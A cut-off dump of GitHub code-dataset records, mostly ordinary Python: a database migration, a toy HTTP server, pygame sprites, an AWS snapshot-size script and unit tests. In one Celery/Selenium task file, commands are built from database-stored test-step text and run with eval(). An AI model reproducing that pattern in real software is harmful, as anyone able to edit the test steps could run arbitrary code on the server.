e1ce83ce683a\nCreate Date: 2022-05-17 19:53:31.183155\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6e820d07d39c'\ndown_revision = 'e1ce83ce683a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('subscriber_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'users', 'subscribers', ['subscriber_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_column('users', 'subscriber_id')\n # ### end Alembic commands ###\n","repo_name":"JosephatNgugi/Blog","sub_path":"migrations/versions/6e820d07d39c_update_model_classes.py","file_name":"6e820d07d39c_update_model_classes.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3045332401","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nimport json\n# import sys\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n # import pdb; pdb.set_trace()\n parsed_path = urlparse(self.path)\n parsed_qs = parse_qs(parsed_path.query)\n\n if parsed_path.path == '/':\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b'You did a thing!')\n return\n\n elif parsed_path.path == './test':\n try:\n cat = json.loads(parse_qs['category'][0])\n except KeyError:\n self.send_response(400)\n self.end_headers()\n self.wfile.write(b'You did a bad thing')\n return\n \n self.send_response(200)\n self.end_headers()\n self.wfile.write(b'We did the thing with the qs')\n\n else:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(b'Not found')\n\n def do_POST(self):\n self.send_response(200)\n self.end_headers()\n self.send_response_only()\n\n\ndef create_server():\n return HTTPServer(('127.0.0.1', 3000), SimpleHTTPRequestHandler)\n\n\ndef run_forever():\n server = create_server()\n\n try:\n print('Starting server on port 3000')\n server.serve_forever()\n except KeyboardInterrupt:\n server.shutdown()\n server.server_close()\n\n\nif __name__ == '__main__':\n run_forever()\n","repo_name":"steveflys/sockets","sub_path":"protocols/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43882685012","text":"# README:\n# This user/mode relies on saving variables to PVD so that they're retrievable on power cycles.\n# On a first boot of the user/mode you may see an error stating 'Error while request to save PCE variables:\n# Error returned from PCE Variable file open routine'. This error is produced because the PCEVarList.cfg file\n# located in /config/mode/caps/*MODENAME*/ is trying to load variables (e.g. ADAPT_FLAG) which don't currently \n# exist, and therefore cannot be loaded. To resolve this issue, run this script to initialise the variables so\n# CAPS can find them. You should only need to run this once. If you're seeing the error often, contact CBM. \n# 1: Open PuTTY and navigate to the mode's SLAVE FOLDER:\n# a) cd /\n# b) cd /config/mode/caps/*MODENAME*/SLAVE/ \n# 2: Type the following:\n# a) python initialise.py\n# 3: A message should state that initialise is running, and then a second message stating that it has completed.\n# 4: Close PuTTY and power cycle the device. Null variables will now exist in the system and CAPS should operate normally.\n\nimport pcepy.pce as pce\nimport numpy as np\n\n# Number of modes/classes.\nnumClasses = 5\n# Number of modes/classes.\nnumModels = 5\n# Number of EMG channels.\nnumEMG = 6\n# Number of features. (10 for '47')\nfeatNum = 4\n# Matrix size.\nmatSize = numEMG * featNum\n# Sample threshold\nsampThres = 100\n# Number of samples in one frame \nwindow = 200\n\nprint('RUNNING INITIALISE...')\n\n# Common variables\npce.set_var('CTRL',1)\npce.set_var('MODE', -1)\npce.set_var('CUR_VAL', 0)\npce.set_var('THRESH_VAL', 0)\npce.set_var('NOISE', 0)\npce.set_var('NOISE_CH', 0)\npce.set_var('NOISE_SCALE', 0)\npce.set_var('COLLECT', 2)\npce.set_var('IN_TRIAL', 0)\npce.set_var('MVC_R', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MVC_T', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MVC', np.zeros((numClasses, numEMG), dtype=float, order='F'))\npce.set_var('N_C', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('N_R', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('N_T', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('DAQ_NOISY', np.zeros((numEMG, window), dtype=float, order='F'))\npce.set_var('FEAT_RAW', np.zeros((1, matSize), dtype=float, order='F'))\npce.set_var('FEAT_NOISY', np.zeros((1, matSize), dtype=float, order='F'))\n\n\n# Variables for PR only\npce.set_var('NEW_CLASS', 0)\npce.set_var('OLD_CLASS', 0)\npce.set_var('VEL', 0)\npce.set_var('RAMP', 1)\npce.set_var('CLASS_ACTIVE', 0)\npce.set_var('CLASS_EST', -1)\npce.set_var('OUT_MAP', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('WG_ADAPT', np.zeros((matSize, numClasses), dtype=float, order='F'))\npce.set_var('CG_ADAPT', np.zeros((1, numClasses), dtype=float, order='F'))\npce.set_var('MID', np.zeros((numClasses, 1), dtype=float, order='F'))\n\nfor i in range(0, numClasses):\n pce.set_var('COV' + str(i), np.zeros((matSize, matSize), dtype=float, order='F'))\n pce.set_var('MN' + str(i), np.zeros((1, matSize), dtype=float, order='F'))\n pce.set_var('CLASS_MAV' + str(i), 0)\n\n# Variables for regression only\npce.set_var('Y_LABEL',-1)\npce.set_var('X', np.zeros((sampThres, matSize + 1), dtype=float, order='F'))\npce.set_var('Y', np.zeros((sampThres, 1), dtype=float, order='F'))\npce.set_var('Y_EST', np.zeros((numModels,1), dtype=float, order='F'))\npce.set_var('ZERO_FLAGS', np.zeros((numModels,numModels), dtype=float, order='F'))\npce.set_var('W', np.zeros((matSize + 1, numModels), dtype=float, order='F'))\nfor i in range(1, numModels):\n pce.set_var('XX' + str(i), np.zeros((matSize + 1, matSize + 1), dtype=float, order='F'))\n pce.set_var('XY' + str(i), np.zeros((matSize + 1, 1), dtype=float, order='F'))\n \nprint('INITIALISE COMPLETE')","repo_name":"yuniteh/PRvLR","sub_path":"embedded/ctrl_beta/SLAVE/initialise.py","file_name":"initialise.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7196911458","text":"import random\r\n\r\n\r\nrc = random.choice\r\n\r\netunimet = \"Pekka Pirjo Paula Arto Kimmo Liisa Maija Lasse Leena\".split()\r\nsukunimet = \"Virtanen Lahtinen Hakanen Järvinen Jokinen Saarinen\".split()\r\n\r\netunimi = rc(etunimet)\r\nsukunimi = rc(sukunimet)\r\nika = random.randint(10,99)\r\n\r\nprint(\"Moi, nimeni on\", etunimi, sukunimi, \"ja olen\", ika, \"vuotta vanha.\")","repo_name":"3liasP/Programming-Basics","sub_path":"Tutoriaalit 1/11. Tulosta nimet ja ika.py","file_name":"11. Tulosta nimet ja ika.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43884344644","text":"import os\nimport sys\nimport tempfile\n\nfrom rez.tests.util import TestBase\nfrom rez.utils import py23\n\n\nclass TestLoadModuleFromFile(TestBase):\n def test_load_module(self):\n \"\"\"Ensure that the imported module does not show up in sys.modules\"\"\"\n # Random chars are used in the module name to ensure that the module name is unique\n # and the test won't fail because some other module with the same name\n # shows up in sys.modules\n module = 'utils_test_7cd3a335'\n\n filename = '{0}.py'.format(module)\n tmpdir = tempfile.mkdtemp(prefix=\"rez_selftest_\")\n\n with open(os.path.join(tmpdir, filename), 'w') as fd:\n fd.write('')\n\n py23.load_module_from_file(\n module,\n os.path.join(tmpdir, filename)\n )\n self.assertEqual(sys.modules.get(module), None, msg='Module was found in sys.modules')\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_utils_py23.py","file_name":"test_utils_py23.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"568073674","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom . import models\n\n\nimport os\nimport time\nimport traceback\nfrom selenium import webdriver\nimport time\nfrom .pic_path import get_pic_path\n\n\ndef get_element(driver,locator_method,locator_exp):\n element = driver.find_element( locator_method, locator_exp)\n return element\n\ndef open_browser(browser_name):\n \n if \"ie\" in browser_name.lower():\n driver = webdriver.Ie(executable_path=\"e:\\\\IEDriverServer\")\n elif \"chrome\" in browser_name.lower():\n driver = webdriver.Chrome(executable_path=\"e:\\\\chromedriver\")\n else:\n driver = webdriver.Firefox(executable_path=\"e:\\\\geckodriver\")\n return driver\n\ndef visit(driver,url):\n \n driver.get(url)\n\ndef input(driver,locator_method,locator_exp,content):\n #global driver\n element = get_element(driver,locator_method,locator_exp)\n element.send_keys(content)\n\ndef click(driver,locator_method,locator_exp):\n #global driver\n element = get_element(driver,locator_method,locator_exp)\n element.click()\n\ndef sleep(driver,seconds):\n time.sleep(float(seconds))\n\ndef assert_word(driver,expected_word):\n #global driver\n assert expected_word in driver.page_source\n\ndef switch_to(driver,locator_method,locator_exp):\n \n element = get_element(driver,locator_method,locator_exp)\n driver.switch_to.frame(element)\n\ndef switch_back(driver):\n \n driver.switch_to.default_content()\n\ndef quit(driver):\n \n driver.quit()\n\ndef take_pic(driver,file_path):\n print(\"***************\",driver)\n try:\n '''\n 调用get_screenshot_as_file(file_path)方法,对浏览器当前打开页面\n 进行截图,并保为C盘下的screenPicture.png文件。\n '''\n result = driver.get_screenshot_as_file(file_path)\n print(result)\n except IOError as e:\n print(e)\n\n\n'''\n@shared_task\ndef add(x, y):\n return x + y\n'''\n\n@shared_task\ndef mul(x, y):\n return x * y\n\n\n@shared_task\ndef web_test_task(execute_id,testcase_id):\n test_steps = models.CaseStep.objects.filter(test_case=testcase_id)\n execute_record = models.TestCaseExecuteRecord.objects.get(id=execute_id)\n execute_record.execute_start_time=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n execute_record.save()\n steps = []\n driver = \"\"\n for test_step in test_steps:\n temp = []\n print(\"---------\",test_step.id,test_step.key_word,test_step.locator_method,\n test_step.locator_exp,test_step.test_data)\n temp.append(test_step.id)\n temp.append(test_step.key_word)\n temp.append(test_step.locator_method)\n temp.append(test_step.locator_exp)\n temp.append(test_step.test_data)\n steps.append(temp)\n \n for test_step in steps:\n key_word = test_step[1].name\n locator_method = test_step[2]\n locator_exp = test_step[3]\n value = test_step[4]\n test_step_result=\"\"\n test_step_exception_info=\"\"\n test_step_capture_screen=\"\"\n case_step_info=\"\"\n command=\"\"\n try:\n if key_word==\"open_browser\":\n driver = open_browser(value)\n print(\"启动浏览器%s成功\" %value)\n test_step_result=\"成功\"\n step_id=test_step[0]\n case_step_info = models.CaseStep.objects.get(id=step_id)\n models.TestCaseStepExecuteRecord.objects.create(\n test_case_execute_record=execute_record,case_step=case_step_info,result=test_step_result)\n continue\n if locator_method is None and value is not None:\n command = '''%s(driver,\"%s\")''' %(key_word,value)\n elif locator_method is None and value is None :\n command = '''%s(driver)''' %(key_word)\n elif locator_method is not None and value is not None:\n print(\"****************\")\n command = '''%s(driver,\"%s\",\"%s\",\"%s\")''' %(key_word,locator_method,locator_exp,value)\n elif locator_method is not None and value is None:\n print(\"----------------\")\n command = '''%s(driver,\"%s\",\"%s\")''' %(key_word,locator_method,locator_exp)\n \n eval(command)\n #1/0\n print(\"执行测试步骤 %s 成功\" %command)\n test_step_result=\"成功\"\n except:\n print(\"执行测试步骤 %s 失败\" %command)\n traceback.print_exc()\n execute_record.exception_info=traceback.format_exc()\n test_step_exception_info=traceback.format_exc()\n execute_record.result=\"失败\"\n file_path = get_pic_path()[0]\n sava_path = get_pic_path()[1]\n take_pic(driver,file_path)\n execute_record.capture_screen = sava_path\n test_step_capture_screen=sava_path\n test_step_result=\"失败\"\n execute_record.save()\n try:\n driver.quit()\n except:\n print(\"关闭浏览器失败\") \n \n print(\"Done!\")\n #execute_record = models.ExecuteRecord.objects.get(execute_id=execute_id)\n step_id=test_step[0]\n case_step_info = models.CaseStep.objects.get(id=step_id)\n step_result=models.TestCaseStepExecuteRecord.objects.create(\n test_case_execute_record=execute_record,case_step=case_step_info,result=test_step_result,\n exception_info=test_step_exception_info,capture_screen=test_step_capture_screen)\n print(\"++++++++++++++\",step_result)\n if test_step_result==\"失败\":\n break\n else:\n execute_record.result=\"成功\"\n execute_record.save() \n \n print(\"done!!!!\") \n execute_record.status=1\n execute_record.execute_end_time=time.strftime(\"%Y-%m-%d %H:%M:%S\") \n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()).split(\".\")[0])\n execute_record.save()\n\n\n@shared_task\ndef web_suit_task(execute_id,testsuit_id):\n test_suit = models.TestSuit.objects.get(id=testsuit_id)\n test_suit_test_cases = models.TestSuitTestCases.objects.filter(test_suit=test_suit)\n test_suit_record=models.TestSuitExecuteRecord.objects.get(id=execute_id)\n test_suit_record.test_result = \"成功\"\n test_suit_record.execute_start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n for test_suit_test_case in test_suit_test_cases:\n test_case = test_suit_test_case.test_case\n test_case_record = models.TestSuitTestCaseExecuteRecord.objects.create(test_suit_record=test_suit_record,test_case=test_case)\n test_steps = models.CaseStep.objects.filter(test_case=test_case)\n test_case_record.execute_start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n test_case_record.save()\n print(\"***********$$$$\", test_steps, \"----$$$$$$\")\n steps = []\n driver = \"\"\n for test_step in test_steps:\n temp = []\n print(\"---------\", test_step.id, test_step.key_word, test_step.locator_method,\n test_step.locator_exp, test_step.test_data)\n temp.append(test_step.id)\n temp.append(test_step.key_word)\n temp.append(test_step.locator_method)\n temp.append(test_step.locator_exp)\n temp.append(test_step.test_data)\n steps.append(temp)\n \n for test_step in steps:\n step_id = models.CaseStep.objects.get(id=test_step[0])\n test_step_record=models.TestSuitTestStepExecuteRecord.objects.create(test_case_record=test_case_record,step_id=step_id)\n key_word = test_step[1].name\n # key_word = test_step[1].strip()\n print(\"________+++++++++++:\", key_word)\n locator_method = test_step[2]\n print(\"####\" * 10, type(locator_method))\n locator_exp = test_step[3]\n value = test_step[4]\n if key_word == \"open_browser\":\n driver = open_browser(value)\n print(\"启动浏览器%s成功\" % value)\n continue\n if locator_method is None and value is not None:\n command = '''%s(driver,\"%s\")''' % (key_word, value)\n elif locator_method is None and value is None:\n command = '''%s(driver)''' % (key_word)\n elif locator_method is not None and value is not None:\n print(\"****************\")\n command = '''%s(driver,\"%s\",\"%s\",\"%s\")''' % (key_word, locator_method, locator_exp, value)\n elif locator_method is not None and value is None:\n print(\"----------------\")\n command = '''%s(driver,\"%s\",\"%s\")''' % (key_word, locator_method, locator_exp)\n \n try:\n eval(command)\n print(\"执行测试步骤 %s 成功\" % command)\n #1/0\n test_step_record.result = \"成功\"\n test_step_record.save() \n except:\n test_step_record.result = \"失败\"\n test_case_record.test_result=\"失败\"\n test_suit_record.test_result=\"失败\"\n print(\"执行测试步骤 %s 失败\" % command)\n traceback.print_exc()\n test_step_record.exception_info = traceback.format_exc()\n test_case_record.exception_info = traceback.format_exc()\n file_path = get_pic_path()[0]\n sava_path = get_pic_path()[1]\n take_pic(driver, file_path)\n test_step_record.capture_screen = sava_path\n test_case_record.capture_screen = sava_path\n test_step_record.save() \n try:\n driver.quit()\n except:\n print(\"关闭浏览器失败\") \n break\n else:\n test_case_record.test_result = \"成功\"\n test_suit_record.save()\n test_case_record.execute_end_time = time.strftime(\"%Y-%m-%d %H:%M:%S\") \n test_case_record.status = 1\n test_case_record.save()\n test_suit_record.status=1\n test_suit_record.save()\n","repo_name":"taoxinbo/auto_test_platform","sub_path":"auto_test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"530077494","text":"import pytest\n\nfrom apigateway.apps.support.api_sdk.distributors.pypi import PypiSourceDistributor\nfrom apigateway.apps.support.constants import ProgrammingLanguageEnum\n\n\n@pytest.fixture\ndef package_searcher(mocker):\n return mocker.MagicMock()\n\n\n@pytest.fixture\ndef package_searcher_result(mocker, package_searcher, faker):\n result = mocker.MagicMock(url=faker.url())\n package_searcher.search.return_value = result\n return result\n\n\n@pytest.fixture\ndef distributor(faker, mocker, sdk_context, settings, package_searcher):\n settings.PYPI_MIRRORS_CONFIG = {\n PypiSourceDistributor.repository: {\n \"index_url\": \"\",\n \"repository_url\": faker.url(),\n \"username\": faker.user_name(),\n \"password\": faker.password(),\n }\n }\n\n distributor = PypiSourceDistributor(\n context=sdk_context,\n )\n distributor.package_searcher = package_searcher\n\n return distributor\n\n\n@pytest.fixture\ndef sdist(tmpdir, sdk_context):\n dist = tmpdir.join(\"dist\")\n dist.mkdir()\n\n source_tar = dist.join(f\"{sdk_context.name}.tar.gz\")\n source_tar.write(\"\")\n return source_tar\n\n\n@pytest.fixture\ndef sdk_context(sdk_context):\n sdk_context.language = ProgrammingLanguageEnum.PYTHON\n return sdk_context\n\n\ndef test_pypirc(\n tmpdir, faker, output_dir, python_setup_script, python_setup_history, sdist, distributor: PypiSourceDistributor\n):\n distributor.distribute(output_dir, [sdist])\n\n pypirc_path = tmpdir.join(\".pypirc\")\n assert pypirc_path.exists()\n\n\ndef test_distribute(\n output_dir,\n sdk_context,\n python_setup_script,\n sdist,\n python_setup_history,\n distributor: PypiSourceDistributor,\n package_searcher_result,\n):\n result = distributor.distribute(output_dir, [sdist])\n\n python_setup_history = python_setup_history.read()\n assert f\"setup.py sdist upload -r {distributor.repository}\" in python_setup_history\n\n assert sdk_context.config[\"python\"][\"is_uploaded_to_pypi\"]\n assert sdk_context.config[\"python\"][\"repository\"] == distributor.repository\n assert result.url == package_searcher_result.url\n assert not result.is_local\n","repo_name":"TencentBlueKing/blueking-apigateway","sub_path":"src/dashboard/apigateway/apigateway/tests/apps/support/api_sdk/distributors/test_pypi.py","file_name":"test_pypi.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"72297871616","text":"import boto3\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\n\nebs = boto3.client('ebs')\nec2 = boto3.client('ec2')\n\n# get sorted list of snapshots\nsnapshots = ec2.describe_snapshots(OwnerIds=['self'])\ndf = pd.DataFrame.from_dict(snapshots['Snapshots'])\ndf.sort_values(by=['OwnerId', \"VolumeId\", \"StartTime\"], inplace = True)\n\n# per volumeid lineage, get for each one changed blocks\ni = 0\nl = len(df.index)\nfirst = True\nblockSize = 524288\nfor index, row in df.iterrows():\n if i == l:\n break\n date = str(row['StartTime']).split('.',1)[0].split(' ')[0]\n time = str(row['StartTime']).split('.',1)[0].split(' ')[1]\n if first:\n v_prev = row['VolumeId']\n sid_prev = row['SnapshotId']\n print(date + ',' + time + ',' + v_prev + \",\" + 'snap-00000000000000000' + \",\" + sid_prev + \",\" + str(row['VolumeSize'] * 1024 * 1024 * 1024))\n first = False\n i = i + 1\n continue\n v = row['VolumeId']\n sid = row['SnapshotId']\n if v == v_prev:\n changed = len(ebs.list_changed_blocks(FirstSnapshotId = sid_prev,SecondSnapshotId = sid)['ChangedBlocks'])\n print(date + ',' + time + ',' + v + \",\" + sid_prev + \",\" + sid + \",\" + str(changed * blockSize))\n else:\n print(date + ',' + time + ',' + v + \",\" + 'snap-00000000000000000' + \",\" + sid + \",\" + str(row['VolumeSize'] * 1024 * 1024 * 1024))\n v_prev = v\n sid_prev = sid\n i = i + 1","repo_name":"akirsman/Snapshots","sub_path":"snapshotsSize.py","file_name":"snapshotsSize.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"27378580061","text":"#\r\n# models.py\r\n#\r\nimport pygame\r\nimport os\r\nimport math\r\nimport random\r\nfrom utils import scale_image\r\n\r\n# ___ MODEL VARIABLES\r\nplayer_scale = 0.75\r\nenemies_scale = 0.6\r\nitem_scale = 0.7\r\n\r\n# ___ Images\r\nsoldier_path = r'files/sprites/soldier/'\r\n\r\n\r\n# player class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self, screen):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n # Create list of images\r\n self.__list = []\r\n for file in os.listdir(soldier_path):\r\n img = pygame.image.load('./' + soldier_path + '/' + file)\r\n self.__list.append(scale_image(img, player_scale))\r\n\r\n self.image = self.__list[0]\r\n self.rect = self.image.get_rect()\r\n self.__saved_image = self.image\r\n\r\n self.rect.left = 0\r\n self.rect.top = 200\r\n self.__speed = 4\r\n\r\n # set the angle value\r\n self.__angle = 0\r\n\r\n def reset_speed(self):\r\n self.__speed = 4\r\n\r\n def increase_speed(self):\r\n self.__speed = 8\r\n\r\n def go_left(self, screen):\r\n if self.rect.left >= 0:\r\n self.rect.left -= self.__speed\r\n\r\n def go_right(self, screen):\r\n if self.rect.right <= screen.get_width():\r\n self.rect.right += self.__speed\r\n\r\n def go_up(self, screen):\r\n if self.rect.top >= 0:\r\n self.rect.top -= self.__speed\r\n\r\n def go_down(self, screen):\r\n if self.rect.bottom <= screen.get_height():\r\n self.rect.bottom += self.__speed\r\n\r\n def get_angle(self):\r\n return self.__angle\r\n\r\n def change_image(self, weapon):\r\n self.image = self.__list[weapon]\r\n self.__saved_image = self.image\r\n\r\n def rotate(self, mouse_pos):\r\n self.__angle = math.degrees(math.atan2(self.rect.centerx - mouse_pos[0], self.rect.centery - mouse_pos[1]))\r\n self.image = pygame.transform.rotate(self.__saved_image, self.__angle)\r\n self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n\r\nclass Alien(pygame.sprite.Sprite):\r\n def __init__(self, screen, speed, damage, hp, attack_speed, value, image, alien_type, player_pos):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.__screen = screen\r\n self.__speed = speed\r\n self.__default_speed = speed\r\n\r\n self.__damage = damage\r\n self.__hp = hp\r\n self.__attack_speed = attack_speed\r\n self.__value = value\r\n self.__alien_type = alien_type\r\n\r\n self.__move = True\r\n self.__count = (attack_speed - 1)\r\n\r\n self.__slow = False\r\n self.__slow_counter = 0\r\n\r\n self.image = image\r\n self.image = scale_image(self.image, enemies_scale)\r\n self.__saved_image = self.image\r\n self.rect = self.image.get_rect()\r\n\r\n self.spawn()\r\n self.rotate(player_pos)\r\n self.set_step_amount(player_pos)\r\n\r\n def reset_attack(self):\r\n self.__count = self.__attack_speed - 1\r\n\r\n def get_attack(self):\r\n self.__count += 1\r\n if self.__count == self.__attack_speed:\r\n self.__count = 0\r\n return True\r\n else:\r\n return False\r\n\r\n def get_alien_type(self):\r\n return self.__alien_type\r\n\r\n def get_damage(self):\r\n return self.__damage\r\n\r\n def get_value(self):\r\n return self.__value\r\n\r\n def damage_hp(self, damage):\r\n self.__hp -= damage\r\n if self.__hp > 0:\r\n return True\r\n else:\r\n return False\r\n\r\n def set_step_amount(self, player_pos):\r\n try:\r\n self.__distance = math.sqrt \\\r\n (pow(player_pos[0] - self.rect.centerx, 2) + pow(player_pos[1] - self.rect.centery, 2))\r\n self.__animation_steps = self.__distance / self.__speed\r\n self.__dx = (player_pos[0] - self.rect.centerx) / self.__animation_steps\r\n self.__dy = (player_pos[1] - self.rect.centery) / self.__animation_steps\r\n except:\r\n self.__dx = 0\r\n self.__dy = 0\r\n\r\n def move(self, boolval):\r\n self.__move = boolval\r\n\r\n def spawn(self):\r\n self.__spawn = random.randint(1, 3)\r\n if self.__spawn == 1:\r\n self.__x = random.randrange(0, -300, -30)\r\n self.__y = random.randint(0, self.__screen.get_height() - 100)\r\n elif self.__spawn == 2:\r\n self.__x = random.randint(self.__screen.get_width(), self.__screen.get_width() + 300)\r\n self.__y = random.randint(0, self.__screen.get_height() - 100)\r\n else:\r\n self.__x = random.randint(0, self.__screen.get_width())\r\n self.__y = random.randint(self.__screen.get_height(), self.__screen.get_height() + 300)\r\n\r\n self.rect.center = (self.__x, self.__y)\r\n\r\n def rotate(self, player_pos):\r\n self.__angle = math.degrees(math.atan2(self.rect.centerx - player_pos[0], self.rect.centery - player_pos[1]))\r\n self.image = pygame.transform.rotate(self.__saved_image, self.__angle)\r\n self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n def update(self):\r\n if self.__move:\r\n self.rect.centerx += self.__dx\r\n self.rect.centery += self.__dy\r\n if self.__slow:\r\n self.__slow_counter += 1\r\n if self.__slow_counter >= 400:\r\n self.__speed = self.__default_speed\r\n self.__slow_counter = 0\r\n self.__slow = False\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n def __init__(self, image, angle, player_pos, mouse_pos, speed, damage, double_damage):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n if double_damage:\r\n self.__damage = damage * 2\r\n else:\r\n self.__damage = damage\r\n\r\n self.__damage = damage\r\n\r\n self.__x = player_pos[0]\r\n self.__y = player_pos[1]\r\n\r\n self.__target_x = mouse_pos[0]\r\n self.__target_y = mouse_pos[1]\r\n\r\n if image:\r\n self.image = image\r\n self.image.convert()\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (self.__x, self.__y)\r\n self.image = pygame.transform.rotate(self.image, angle)\r\n self.rect = self.image.get_rect(center=self.rect.center)\r\n else:\r\n self.image = pygame.Surface((5, 5))\r\n self.image.fill((255, 0, 0))\r\n self.image.set_alpha(0)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (self.__x, self.__y)\r\n\r\n self.__distance = math.sqrt(pow(self.__target_x - self.__x, 2) + pow(self.__target_y - self.__y, 2))\r\n self.__animation_steps = self.__distance / speed\r\n self.__dx = (self.__target_x - self.__x) / self.__animation_steps\r\n self.__dy = (self.__target_y - self.__y) / self.__animation_steps\r\n\r\n def get_damage(self):\r\n return self.__damage\r\n\r\n def update(self):\r\n self.rect.centerx += self.__dx\r\n self.rect.centery += self.__dy\r\n if self.rect.top < 0 or self.rect.bottom > 620 or self.rect.left < 0 or self.rect.right > 1280:\r\n self.kill()\r\n\r\n\r\nclass StatusBar(pygame.sprite.Sprite):\r\n def __init__(self, position, color1, color2, size, status1, status2, typeof, increase):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n self.__colors = [color1, color2]\r\n self.__size = size\r\n self.__s1 = status1\r\n self.__s2 = float(status2)\r\n self.__m = size[0] * 100\r\n self.__type = typeof\r\n self.__increase = increase\r\n\r\n self.image = pygame.Surface(size)\r\n self.image.fill(color2)\r\n pygame.draw.rect(self.image, color1, ((0, 0), (self.__s1 / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n self.rect = self.image.get_rect()\r\n self.rect.left = position[0]\r\n self.rect.top = position[1]\r\n\r\n def set_position(self, position):\r\n self.rect.left = position[0]\r\n self.rect.top = position[1]\r\n\r\n def set_status(self, current_status):\r\n self.image.fill(self.__colors[1])\r\n pygame.draw.rect(self.image, self.__colors[0], ((0, 0),\r\n (current_status / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n def get_reload(self):\r\n if self.__s2 - self.__s1 < 0:\r\n return True\r\n\r\n def update(self):\r\n if self.__type:\r\n self.image.fill(self.__colors[1])\r\n self.__s1 += self.__increase\r\n pygame.draw.rect(self.image, self.__colors[0],\r\n ((0, 0), (self.__s1 / self.__s2 * 100 * self.__m, self.__size[1])), 0)\r\n\r\n if self.__s2 - self.__s1 < -1:\r\n self.kill()\r\n\r\n\r\nclass Text(pygame.sprite.Sprite):\r\n def __init__(self, size, color, position, variables, message, alpha):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.__font = pygame.font.Font(r\"files/fonts/space_font.ttf\", int(size/1.5))\r\n self.__color = color\r\n self.__position = position\r\n\r\n if variables:\r\n self.__variables = variables.split(',')\r\n if len(self.__variables) > 3:\r\n self.__variables.pop()\r\n\r\n self.__message = message\r\n self.__m = ''\r\n self.__alpha = alpha\r\n\r\n def set_variable(self, index, value):\r\n self.__variables[index] = value\r\n\r\n def set_alpha(self, alpha):\r\n self.__alpha = alpha\r\n\r\n def update(self):\r\n if self.__variables:\r\n self.__m = self.__message % tuple(self.__variables)\r\n else:\r\n self.__m = self.__message\r\n\r\n self.image = self.__font.render(self.__m, True, self.__color)\r\n self.image.set_alpha(self.__alpha)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (self.__position)\r\n\r\n\r\nclass Powerup(pygame.sprite.Sprite):\r\n def __init__(self, location, num, image):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n self.image = scale_image(image, item_scale)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = location\r\n\r\n self.__type = num\r\n\r\n self.__count = 0\r\n self.__alpha = 255\r\n\r\n def get_type(self):\r\n return self.__type\r\n\r\n def update(self):\r\n self.__count += 1\r\n if self.__alpha == 0:\r\n self.kill()\r\n elif self.__count >= 300:\r\n self.image.set_alpha(self.__alpha)\r\n self.__alpha -= 3\r\n","repo_name":"Czajka4/SCR_Game","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29593235612","text":"import random\r\nfrom browser import document, alert\r\nimport js\r\n\r\n# Initialise les widgets\r\nuser_cards_label = document.createElement(\"label\")\r\nuser_cards_label.textContent = \"Vos cartes : \"\r\ndocument <= user_cards_label\r\n\r\nuser_cards = document.createElement(\"label\")\r\nuser_cards_value = 